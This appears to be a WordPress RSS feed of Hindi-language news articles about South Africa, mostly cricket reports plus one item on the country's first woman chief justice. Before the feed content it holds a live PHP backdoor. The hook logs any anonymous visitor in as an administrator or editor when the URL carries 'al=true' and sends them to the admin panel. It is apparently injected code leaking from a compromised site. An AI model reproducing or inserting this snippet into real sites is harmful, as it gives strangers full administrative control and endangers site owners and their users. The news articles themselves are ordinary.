// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); South Africa – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Thu, 26 Feb 2026 05:26:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 वेस्टइंडीज के सामने दक्षिण अफ्रीका की तेज गेंदबाजी की कड़ी परीक्षा https://pratyushaashakinayikiran.com/?p=200857 Thu, 26 Feb 2026 05:26:00 +0000 https://pratyushaashakinayikiran.com/?p=200857 अहमदाबाद
टूर्नामेंट में अब तक अपराजेय रही वेस्टइंडीज और दक्षिण अफ्रीका की टीमें टी20 विश्व कप सुपर आठ के मुकाबले में बृहस्पतिवार को आमने सामने होंगी तो आक्रामक कैरेबियाई बल्लेबाजों को बेहतरीन गेंदबाजी आक्रमण से पार पाना होगा। दक्षिण अफ्रीका ने खिताब की प्रबल दावेदार भारतीय टीम को पिछले मैच में इसी मैदान पर 76 रन से हराया था जबकि वेस्टइंडीज ने जिम्बाब्वे को मुंबई में 107 रन से मात दी।

वेस्टइंडीज के पास बेहतरीन आक्रामक बल्लेबाज हैं जो अपने दम पर मैच जिताने का माद्दा रखते हैं। अब उनका सामना हालांकि दक्षिण अफ्रीका के ऐसे गेंदबाजी आक्रमण से होगा जिसने रविवार को भारतीय बल्लेबाजों को नाकों चने चबवा दिये थे।

मार्को यानसेन, केशव महाराज, कैगिसो रबाडा और लुंगी एनगिडि ने मिलकर लगातार अच्छा प्रदर्शन किया है। दूसरी ओर दक्षिण अफ्रीका के बल्लेबाज भी कमतर नहीं है और डेविड मिलर ने अक्सर संकटमोचक की भूमिका निभाई है। भारत के खिलाफ पावरप्ले में कई विकेट गंवाने के बाद उन्होंने पारी को संभाला।

इस महा मुकाबले में व्यक्तिगत टक्कर पर भी नजरें होंगी मसलन शिमरोन हेटमायेर कैसे रबाडा की गेंदों को खेलते हैं या रोवमैन पॉवेल को महाराज की फिरकी कितना परेशान कर पाती है। मिलर का अनुभव बायें हाथ के स्पिनर अकील हुसैन के सामने कितना काम आता है या यानसेन की गेंदों की उछाल ब्रेंडन किंग को रास आती है या नहीं।

यह मैच दिन में खेला जायेगा तो समीकरण अलग होंगे। ओस नहीं होने से टॉस का महत्व उतना नहीं रहेगा। पिच सूखी रहने से शुरूआत में ही स्पिनरों की भूमिका हो सकती है। दक्षिण अफ्रीका ने अपने अधिकांश मैच नरेन्द्र मोदी स्टेडियम पर ही खेले हैं जिससे टीम यहां के हालात में ढल चुकी है। इसका फायदा उसे इस महत्वपूर्ण मैच में मिल सकता है।

वेस्टइंडीज अगर जीत जाता है तो भारत के लिये मुश्किलें खड़ी हो सकती है। इससे वेस्टइंडीज सेमीफाइनल में पहुंचने के करीब आ जायेगा और दक्षिण अफ्रीका को आखिरी सुपर आठ मैच में जिम्बाब्वे को हराना होगा। ऐसे में भारत को वेस्टइंडीज और जिम्बाब्वे दोनों पर बड़े अंतर से जीत दर्ज करनी होगी।

टीमें :
वेस्टइंडीज: शाई होप (कप्तान), जॉनसन चार्ल्स, रोस्टन चेज़, मैथ्यू फोर्डे, शिम्रोन हेटमायर, जेसन होल्डर, अकील होसेन, शमर जोसेफ, ब्रैंडन किंग, गुडाकेश मोती, रोवमैन पॉवेल, शेरफेन रदरफोर्ड, क्वेंटिन सैम्पसन, जेडन सील्स, रोमारियो शेफर्ड।

दक्षिण अफ्रीका: एडेन मार्क्रम (कप्तान), क्विंटन डीकॉक (विकेटकीपर), रयान रिकलटन, डेवाल्ड ब्रेविस, ट्रिस्टन स्टब्स, डेविड मिलर, मार्को यानसन, कैगिसो रबाडा, लुंगी एनगिडी, केशव महाराज, कॉर्बिन बॉश, एनरिक नार्किया, क्वेना मफाका, जॉर्ज लिंडे, जेसन स्मिथ।

मैच का समय : दोपहर तीन बजे से।

 

]]>
दक्षिण अफ्रीका ने दर्ज की अंडर 19 वर्ल्ड कप इतिहास की दूसरी सबसे बड़ी जीत, इस टीम को 300 से ज्यादा रनों से हराया https://pratyushaashakinayikiran.com/?p=193928 Mon, 19 Jan 2026 16:53:00 +0000 https://pratyushaashakinayikiran.com/?p=193928 नई दिल्ली
दक्षिण अफ्रीका ने तंजानिया के खिलाफ अंडर 19 वर्ल्ड कप 2026 के 14वें मुकाबले में 329 रन से जीत दर्ज की। यह अंडर-19 वर्ल्ड कप इतिहास में रनों के लिहाज से दूसरी सबसे बड़ी जीत है। इस मामले में ऑस्ट्रेलियाई टीम शीर्ष पर है, जिसने 20 जनवरी 2002 को केन्या के विरुद्ध 430 रन से जीत हासिल की थी। वहीं, लिस्ट में तीसरे पायदान पर मौजूद भारत ने 22 जनवरी 2022 को युगांडा के खिलाफ मुकाबला 326 रन से जीता था।

दक्षिण अफ्रीका ने 397 रन बनाए
हाई परफॉर्मेंस ओवल में खेले गए ग्रुप-डी के इस मुकाबले में टॉस गंवाकर बल्लेबाजी के लिए उतरी दक्षिण अफ्रीकी टीम ने निर्धारित ओवरों में 5 विकेट खोकर 397 रन बनाए। इस टीम के लिए जोरिच वान शाल्कविक और अदनान लगैडियन ने 7.5 ओवरों में 58 रन की साझेदारी की। जोरिच वान शाल्कविक ने 34 गेंदों में 5 छक्कों और 2 चौकों के साथ 47 रन बनाए, जबकि अदनान ने 31 गेंदों में 32 रन की पारी खेली।
 
मोहम्मद बुलबुलिया और जेसन रॉवल्स ने जड़े शतक
टीम ने 93 के स्कोर तक सलामी बल्लेबाजों के विकेट गंवा दिए थे। यहां से कप्तान मोहम्मद बुलबुलिया और जेसन रॉवल्स ने तीसरे विकेट के लिए 176 गेंदों में 201 रन की साझेदारी करते हुए टीम को मजबूत स्थिति में ला दिया। मोहम्मद बुलबुलिया 108 गेंदों में 11 बाउंड्री के साथ 108 रन बनाकर आउट हुए, जबकि जेसन ने 101 गेंदों में 5 छक्कों और 10 चौकों के साथ 125 रन की नाबाद पारी खेली। इनके अलावा, पॉल जेम्स ने 18 गेंदों में ताबड़तोड़ 46 रन बनाए।

तंजानिया 32.2 ओवरों में महज 68 रन पर सिमट गई
विपक्षी खेमे से सिम्बा म्बाकी ने सर्वाधिक 2 विकेट हासिल किए, जबकि खालिदी जुमा और अल्फ्रेड डेनिययल ने 1-1 विकेट अपने नाम किया। इसके जवाब में तंजानिया 32.2 ओवरों में महज 68 रन पर सिमट गई। इस टीम ने 13 के स्कोर तक अपने 4 विकेट खो दिए थे। यहां से लक्ष बकरानिया ने सिम्बा म्बाकी के साथ पांचवें विकेट के लिए 26 रन जुटाए, लेकिन इस जोड़ी के टूटते ही टीम फिर से लड़खड़ा गई।
 
सिम्बा म्बाकी ने 17 रन, जबकि एक्रे पास्कल ह्यूगो ने नाबाद 12 रन टीम के खाते में जोड़े, लेकिन तंजानिया को शर्मनाक हार से बचा नहीं सके। दक्षिण अफ्रीका की तरफ से बुयांडा माजोला और जेसन रोल्स ने 2-2 विकेट निकाले। यह दक्षिण अफ्रीका की टूर्नामेंट में लगातार दूसरी जीत रही, जबकि तंजानिया को लगातार दूसरी शिकस्त झेलनी पड़ी है।

]]>
साउथ अफ्रीका ने AUS को दी करारी हार, लगातार पांचवीं ODI सीरीज में विजेता https://pratyushaashakinayikiran.com/?p=180023 Sat, 23 Aug 2025 07:06:00 +0000 https://pratyushaashakinayikiran.com/?p=180023  एरिना

साउथ अफ्रीका ने ऑस्ट्रेलिया के खिलाफ वनडे सीरीज जीत ली है. 22 अगस्त (शुक्रवार) को मैके के ग्रेट बैरियर रीफ एरिना में हुए वनडे सीरीज के दूसरे मुकाबले में साउथ अफ्रीका ने मेजबान टीम को 84 रनों से हराया. मुकाबले में ऑस्ट्रेलिया को जीत के लिए 277 रनों का टारगेट मिला था, लेकिन उसकी पूरी टीम 37.4 ओवर्स में 193 रनों पर सिमट गई. तीन मैचों की वनडे सीरीज का आखिरी मुकाबला 24 अगस्त (रविवार) को इसी मैदान पर खेला जाएगा.

साउथ अफ्रीका ने ऑस्ट्रेलिया के विरुद्ध पिछली 10 द्विपक्षीय ओडीआई सीरीज में से आठ में जीत हासिल की है. साथ ही साउथ अफ्रीका की ऑस्ट्रेलिया के खिलाफ ये लगातार पांचवीं द्विपक्षीय वनडे सीरीज जीत है. देखा जाए, तो ऑस्ट्रेलिया ने अपने पिछले आठ ओडीआई मैचों में से सिर्फ एक में जीत हासिल की है. इस साल चैम्पियंस ट्रॉफी में कंगारू टीम ने लाहौर में इंग्लैंड के खिलाफ 352 रनों का सफलतापूर्वक पीछा किया था.

मुकाबले में साउथ अफ्रीकी ने टॉस जीतकर पहले बैटिंग करते हुए 49.1 ओवर्स में 277 रन बनाए थे. मैथ्यू ब्रीट्जके ने 88 और ट्रिस्टन स्टब्स ने 74 रनों का योगदान दिया. ऑस्ट्रेलिया की ओर से स्पिनर एडम जाम्पा ने सबसे ज्यादा तीन विकेट चटकाए. जबकि जेवियर बार्टलेट, नाथन एलिस और मार्नस लाबुशेन को दो-दो सफलताएं मिलीं.

लुंगी एनगिडी ने खोला 'पंजा'
जवाब में ऑस्ट्रेलियाई टीम विकेटकीपर बल्लेबाज जोश इंग्लिस की शानदार इनिंग्स के बावजूद लक्ष्य से काफी दूर रह गई. इंग्लिस ने 74 गेंदों पर 87 रन बनाए, जिसमें 10 चौके और दो छक्के शामिल रहे. साउथ अफ्रीका की ओर से तेज गेंदबाज लुंगी एनिगडी ने सबसे ज्यादा 5 विकेट झटके. सेनुरन मुथुसामी और नंद्रे बर्गर को दो-दो सफलताएं हासिल हुईं.

साउथ ने इस जीत के साथ ही टी20 सीरीज में मिली हार का बदला ले लिया. बता दें कि ऑस्ट्रेलिया और साउथ अफ्रीका के बीच वनडे सीरीज का पहला मुकाबला 19 अगस्त को केर्न्स के कैजली स्टेडियम में खेला गया था, जिसमें मेहमान टीम ने 98 रनों से जीत हासिल की. अब उसने दूसरे वनडे में भी जीत हासिल कर कंगारुओं का घमंड चकनाचूर कर दिया. नियमित कप्तान टेम्बा बावुमा अनफिट होने के चलते दूसरे वनडे में नहीं खेले, जिसके कारण एडेन मार्करम ने साउथ अफ्रीका की कप्तानी की.

]]>
दक्षिण अफ्रीका ने श्रीलंका को 233 रनों से रौंदा, विश्व टेस्ट चैंपियनशिप तालिका में दूसरे स्थान पर पहुंचा https://pratyushaashakinayikiran.com/?p=104977 Sun, 01 Dec 2024 14:10:00 +0000 https://pratyushaashakinayikiran.com/?p=104977 डरबन.
दक्षिण अफ्रीका शनिवार को किंग्समीड क्रिकेट स्टेडियम में श्रीलंका पर 233 रनों की शानदार जीत के बाद विश्व टेस्ट चैंपियनशिप तालिका में भारत से पीछे दूसरे स्थान पर पहुंच गया। मार्को जेनसन की अगुआई में प्रोटियाज गेंदबाजी आक्रमण ने दूसरी पारी में श्रीलंकाई बल्लेबाजी क्रम को तहस-नहस कर दिया और अपने विरोधियों को मात्र 42 रनों के स्कोर पर ढेर कर दिया। जेनसन 1991 में क्रिकेट में दक्षिण अफ्रीका के फिर से प्रवेश के बाद से दस विकेट लेने वाले पहले बाएं हाथ के तेज गेंदबाज बन गए।

पहली पारी में बल्लेबाजी करने के बाद, प्रोटियाज ने संघर्ष किया। एक के बाद एक विकेट गिरने के बाद, कप्तान तेम्बा बावुमा की 70 रनों की पारी ने उनकी टीम को 191/10 तक पहुंचाया। पहली पारी में 200 रन के आंकड़े को पार न कर पाने के कारण प्रोटियाज गेंदबाजों ने दूसरे दिन भारी दबाव में मैदान संभाला और शानदार प्रदर्शन किया। मार्को जेनसन के शानदार 6.5 ओवर के स्पेल में बाएं हाथ के तेज गेंदबाज ने सात विकेट झटके। कैगिसो रबाडा (1) और गेराल्ड कोएट्जी (2) ने जेनसन की मदद की और मेहमान टीम को 42 रन पर समेट दिया, जिससे उन्हें 149 रन की बढ़त मिली।

ट्रिस्टन स्टब्स (122) और बावुमा (113) ने श्रीलंका के खिलाफ टेस्ट मैचों में दक्षिण अफ्रीका के लिए चौथे विकेट के लिए सबसे बड़ी 249 रन की साझेदारी की और 2012 में केपटाउन के न्यूलैंड्स में एबी डिविलियर्स और जैक्स कैलिस द्वारा बनाए गए 192 रन के रिकॉर्ड को तोड़ा। 366/5 के स्कोर पर प्रोटियाज ने अपनी पारी घोषित कर दी और मेहमान टीम को 516 रनों का विशाल लक्ष्य दिया।

दिनेश चांडीमल और कप्तान धनंजय डी सिल्वा के बेहतरीन प्रयासों के बावजूद मेहमान टीम 282 रनों पर ढेर हो गई और मेजबान टीम को यादगार जीत मिली। मैन ऑफ द मैच चुने जाने के बाद जेनसन ने कहा, “मैंने हमेशा पांच विकेट लेने का सपना देखा था, लेकिन कभी नहीं सोचा था कि मैं 10 विकेट लूंगा, लेकिन आप इसी के लिए काम करते हैं। यह अभी तक समझ में नहीं आया है (पहली पारी के प्रदर्शन के बारे में बात करते हुए)। दूसरी पारी में, हमें लगा कि पिच थोड़ी सपाट, धीमी और नीची है, लेकिन 11 विकेट लेना एक सपना सच होने जैसा है।”

]]>
साउथ अफ्रीका की टेस्ट जीत से WTC मेें उथल-पुथल, जानें टीम इंडिया का समीकरण https://pratyushaashakinayikiran.com/?p=89503 Fri, 25 Oct 2024 10:56:00 +0000 https://pratyushaashakinayikiran.com/?p=89503 मीरपुर

बांग्लादेश और साउथ अफ्रीका के बीच टेस्ट सीरीज का पहला मुकाबला मीरपुर के शेरे बांग्ला नेशनल स्टेडियम में खेला गया. इस मुकाबले में साउथ अफ्रीका ने मेजबान बांग्लादेश को सात विकेट से हरा दिया. अफ्रीकी टीम को जीत के लिए 106 रनों का टारगेट मिला था, जिसे उसने खेल के चौथे दिन (24 अक्टूबर) हासिल कर लिया. साउथ अफ्रीका ने 10 साल बाद एशियाई महाद्वीप में टेस्ट जीत हासिल की है. इससे पहले एशियाई महाद्वीप में साउथ अफ्रीका को आखिरी टेस्ट जीत 2014 में श्रीलंका के खिलाफ गॉल में मिली थी.

साउथ अफ्रीका को बंपर फायदा, बांग्लादेश बाहर

मीरपुर टेस्ट में यादगार जीत के बाद साउथ अफ्रीका को वर्ल्ड टेस्ट चैम्पियनशिप (WTC) के पॉइंट्स टेबल में बंपर फायदा हुआ है. अफ्रीकी टीम अब WTC अंकतालिका में चौथे नंबर पर पहुंच गई है. साउथ अफ्रीका का अंक प्रतिशत (PCT) बढ़कर 47.62 हो गया है. अफ्रीकी टीम अंकतालिका में न्यूजीलैंड (44.44 ) और इंग्लैंड (43.06 ) से आगे निकल गई है है. उधर बांग्लादेश की टीम इस हार के बावजूद WTC टेबल में सातवें स्थान पर बनी हुई है, हालांकि उसका पीसीटी 34.38 से घटकर 30.56 हो गया है.

अब बांग्लादेशी टीम फाइनल की दौड़ से भी बाहर हो गई है. देखा जाए तो साउथ अफ्रीकी टीम को मौजूदा चक्र में पांच और मुकाबले खेलने हैं. यदि अफ्रीकी टीम इन पांचों मुकाबलों में जीत हासिल कर लेती है, तो वह अधिकतम 69.44 प्रतिशत अंक हासिल कर सकती है जो उसे अगले साल लॉर्ड्स में होने वाले फाइनल में जगह दिलाने के लिए पर्याप्त होगा. चार मैच जीतने पर भी साउथ अफ्रीका 61.11 प्रतिशत अंकों के साथ फाइनल के लिए तगड़ी दावेदारी पेश करेगा.

भारतीय टीम के क्या समीकरण?

बता दें कि भारतीय टीम वर्ल्ड टेस्ट चैम्पियनशिप की अंकतालिका में फिलहाल पहले स्थान पर है. उसके अब तक 12 मैचों में 8 जीत, 3 हार और एक ड्रॉ से 98 अंक हैं. उसके अंकों का प्रतिशत 68.06 है. भारत को मौजूदा चक्र में 7 मैच और खेलने हैं. भारतीय को नवंबर में पांच टेस्ट मैचों के लिए ऑस्ट्रेलिया का दौरा करना है. उससे पहले वह पुणे और मुंबई में न्यूजीलैंड से टेस्ट मैच खेल रही है. भारत को फाइनल में पहुंचने के लिए इन सात मैचों में कम से कम 3 में तो जरूर जीत हासिल करनी होगी. यदि वो 4 मैच जीतती है, तो जगह पूरी तरह पक्की होगी. 3 टेस्ट जीतने की स्थिति में भारत को अन्य किसी टीम की जीत या हार पर निर्भर रहना पड़ सकता है.

WTC टेबल में ऑस्ट्रेलिया दूसरे स्थान पर है. कंगारू टीम के 12 मैच में 8 जीत, तीन हार एवं एक ड्रॉ से 90 अंक हैं. उसका अंक प्रतिशत 62.50 है. उधऱ श्रीलंकाई टीम तीसरे स्थान पर है. श्रीलंका के नौ मैचों में 55.56 प्रतिशत अंक और 60 पॉइंट हैं. वहीं साउथ अफ्रीका चौथे, न्यूजीलैंड पांचवें और इंग्लैंड छठे पायदान पर है. जबकि बांग्लादेश सातवें, पाकिस्तान आठवें और वेस्टइंडीज नौवें नंबर पर है. कहने का अर्थ यह है कि WTC टेबल में पाकिस्तान सिर्फ वेस्टइंडीज से आगे है.

बता दें कि वर्ल्ड टेस्ट चैम्पियनशिप का यह तीसरा चक्र है, जो 2023 से 2025 तक चलेगा. इस तीसरे चक्र के लिए आईसीसी पॉइंट्स सिस्टम से जुड़े नियमों को पहले ही रिलीज कर चुकी है. टेस्ट मैच जीतने पर टीम को 12 अंक, मैच ड्रॉ होने पर 4 अंक और मुकाबला टाई होने पर 6 पॉइंट मिलेंगे.

वहीं मैच जीतने पर 100 फीसदी, टाई होने पर 50 फीसदी, ड्रॉ होने पर 33.33 फीसदी और हार पर शून्य फीसदी अंक जोड़े जाएंगे. किसी दो मैच की सीरीज में कुल 24 प्वाइंट और पांच मैच की सीरीज में 60 अंक उपलब्ध होंगे. WTC टेबल में जीत प्रतिशत के आधार पर रैंकिंग का प्राथमिक तौर पर निर्धारण होता है.

]]>
न्यूजीलैंड और दक्षिण अफ्रीका के बीच महिला विश्व कप फाइनल से नया चैम्पियन मिलना तय https://pratyushaashakinayikiran.com/?p=87396 Sun, 20 Oct 2024 09:15:00 +0000 https://pratyushaashakinayikiran.com/?p=87396 दुबई
 सोफी डिवाइन के नेतृत्व में न्यूजीलैंड की स्वर्णिम पीढ़ी के खिलाड़ियों के पास वैश्विक आईसीसी ट्रॉफी पर हाथ रखने का आखिरी मौका होगा जब टीम टी20 विश्व कप के फाइनल मुकाबले में रविवार को यहां दक्षिण अफ्रीका से भिड़ेगी।

इस फाइनल मैच से टी20 विश्व का नया चैम्पियन मिलना तय है क्योंकि दोनों टीमों ने इससे पहले कभी भी इस प्रारूप का खिताब नहीं जीता है।

न्यूजीलैंड की महिला टीम ने 2000 में एकदिवसीय विश्व कप जीता था लेकिन मौजूदा टीम का कोई भी सदस्य उस ऐतिहासिक खिताबी जीत का हिस्सा नहीं था।

इस आयोजन के शुरू होने से पहले लगातार 10 मैचों में हार के कारण न्यूजीलैंड का आत्मविश्वास डगमगाया हुआ था लेकिन डिवाइन के नेतृत्व में इस समूह ने शानदार वापसी की। टीम को सुजी बेट्स, अमेलिया केर और ली ताहुहू जैसी अनुभवी खिलाड़ियों की मौजूदगी का फायदा मिला।

यह संभवतः आखिरी बार है डिवाइन, बेट्स और ताहुहू किसी वैश्विक टूर्नामेंट में राष्ट्रीय टीम की ओर से खेलेंगे।

पैतीस वर्षीय डिवाइन के नाम सफेद गेंद प्रारूप में 7000 से अधिक रन हैं, जबकि 37 वर्षीय बेट्स के नाम 10, 000 से अधिक रन हैं।

तेज गेंदबाज ताहुहू 34 साल की है। उन्होंने वनडे में 112 और टी20 अंतरराष्ट्रीय में 93 विकेट चटकाये हैं। यह खिलाड़ी विश्व कप ट्रॉफी के सपने को पूरा करने के लिए कोई कसर नहीं छोड़ेंगे।

दक्षिण अफ्रीका भी पिछले साल की कसक को दूर कर खिताब को अपने नाम करना चाहेगा। पिछले साल घरेलू मैदान पर विश्व कप फाइनल में उसे ऑस्ट्रेलिया के हाथों शिकस्त मिली थी।

न्यूजीलैंड के खिलाड़ियों में टूर्नामेंट में अहम मौकों पर अपने खेल के स्तर को ऊंचा उठाया है और जब बल्लेबाजों के प्रदर्शन में गिरावट आयी तो गेंदबाजों ने टीम को मैच जिताया है। वेस्टइंडीज के खिलाफ सेमीफाइनल मैच में भी ऐसा ही नजारा दिखा जब गेंदबाजों ने वेस्टइंडीज के आक्रामक बल्लेबाजों को रोककर कम स्कोर वाले मैच को अपने नाम किया।

केर के नाम टूर्नामेंट में अब 12 विकेट है। उन्हें दूसरे छोर से एडेन कारसन (आठ विकेट), रोसमरी मायर (सात विकेट) और अनुभवी ताहुहू का अच्छा साथ मिला।

न्यूजीलैंड ने प्रतियोगिता में अपने अभियान का आगाज भारत पर बड़ी जीत से किया था लेकिन ग्रुप चरण में उसे टूर्नामेंट की सबसे मजबूत टीमों में से एक ऑस्ट्रेलिया के खिलाफ 60 रन से शिकस्त का सामना करना पड़ा था।

टीम ने कम स्कोर वाले सेमीफाइनल में वेस्टइंडीज पर मनोबल बढ़ाने वाली जीत दर्ज कर तीसरी बार फाइनल का टिकट पक्का किया।

दक्षिण अफ्रीका ने खेल के हर विभाग में शानदार प्रदर्शन किया है। लौरा वोलवार्ट (190 रन) और तजमिन ब्रिट्स (170 रन) टूर्नामेंट में सबसे ज्यादा रन बनाने वाली खिलाड़ियों में शामिल है।

सेमीफाइनल में ऑस्ट्रेलिया पर आठ विकेट की शानदार जीत के कारण टीम का मनोबल काफी बढ़ा होगा। दक्षिण अफ्रीका ने इस मैच में ऑस्ट्रेलिया को पांच विकेट पर 135 रन पर रोकने के बाद दो ओवर से अधिक बाकी रहते मैच को अपने नाम किया था।

दक्षिण अफ्रीका की टीम काफी हद तक वोलवार्ट और ब्रिट्स की जोड़ी पर निर्भर रहेगी। इस जोड़ी को हालांकि एनेके बॉश और मारिजान कैप जैसे खिलाड़ियों के साथ की भी जरूरत होगी।

गेंदबाजी में नॉनकुलुले म्लाबा (10 विकेट) को भी सेमीफाइनल के अपने प्रदर्शन को दोहराने के लिए बाकी गेंदबाजों की जरूरत होगी।

टीमें:

न्यूजीलैंड: सोफी डिवाइन (कप्तान), सूजी बेट्स, एडेन कारसन, इसाबेला गेज (विकेटकीपर), मैडी ग्रीन, ब्रुक हॉलिडे, फ्रैन जोनास, लेह कास्पेरेक, अमेलिया केर, जेस केर, रोसमरी मायर, मौली पेनफोल्ड, जॉर्जिया प्लिमर, हन्ना रोवे, ली ताहुहू।

दक्षिण अफ्रीका: लौरा वोलवार्ट (कप्तान), एनेके बॉश, ताजमिन ब्रिट्स, नादिन डी क्लार्क, एनेरी डर्कसन, मिके डी रिडर (विकेटकीपर), अयांदा ह्लुबी, सिनालो जाफ्ता (विकेटकीपर), मारिजान कैप, अयाबोंगा खाका, सुने लुस, नॉनकुलुले म्लाबा, सेशनी नायडू, तुमी सेखुखुने, क्लो ट्रायॉन।

मैच भारतीय समयानुसार शाम 07:30 बजे शुरू होगा।

 

]]>
दक्षिण अफ्रीका में पहली बार किसी महिला को प्रधान न्यायाधीश नियुक्त किया गया https://pratyushaashakinayikiran.com/?p=54878 Sat, 27 Jul 2024 09:16:00 +0000 https://pratyushaashakinayikiran.com/?p=54878 केपटाउन
 दक्षिण अफ्रीका में पहली बार किसी महिला को प्रधान न्यायाधीश के पद पर नियुक्त किया गया है।दक्षिण अफ्रीका के राष्ट्रपति सिरिल रामाफोसा ने वर्तमान उप प्रधान न्यायाधीश मंडिसा माया को  देश की प्रधान न्यायाधीश नियुक्त किया।दक्षिण अफ्रीका की प्रधान न्यायाधीश के पद पर माया का कार्यकाल एक सितंबर से प्रारंभ होगा। वह मौजूदा प्रधान न्यायाधीश रेमंड जोंडो के सेवानिवृत्त होने के बाद उनका स्थान लेंगी।

देश के शीर्ष ‘संवैधानिक न्यायालय’ में पदोन्नति से पहले 60 वर्षीय माया दक्षिण अफ्रीका की दूसरी सबसे बड़ी अदालत ‘सुप्रीम कोर्ट ऑफ अपील’ में ‘जज प्रेसिडेंट’ के पद पर सेवाएं दे चुकी हैं।

वह ‘सुप्रीम कोर्ट ऑफ अपील’ की न्यायाधीश नियुक्त होने वाली पहली अश्वेत महिला थीं तथा उस अदालत की उप-अध्यक्ष और फिर अध्यक्ष नियुक्त होने वाली पहली महिला थीं।

रामाफोसा ने फरवरी में माया को प्रधान न्यायाधीश पद के लिए नामित किया था और मई में न्यायिक सेवा आयोग ने उनका साक्षात्कार लिया था।

रामाफोसा ने एक बयान में कहा कि आयोग ने उनके नाम की सिफारिश की है और कहा है कि उनकी नियुक्ति ‘‘देश के लिए मील का पत्थर साबित होगी।’’

माया दक्षिण अफ्रीका के पूर्वी केप प्रांत के एक ग्रामीण इलाके में पली-बढ़ी हैं। उन्हें 1989 में अमेरिका के ड्यूक विश्वविद्यालय में कानून में स्नातकोत्तर करने के लिए ‘फुलब्राइट छात्रवृत्ति’ प्राप्त हुई थी, जो दक्षिण अफ्रीका में रंगभेद के दौर में किसी युवा अश्वेत महिला के लिए दुर्लभ उपलब्धि थी।

 

 

]]>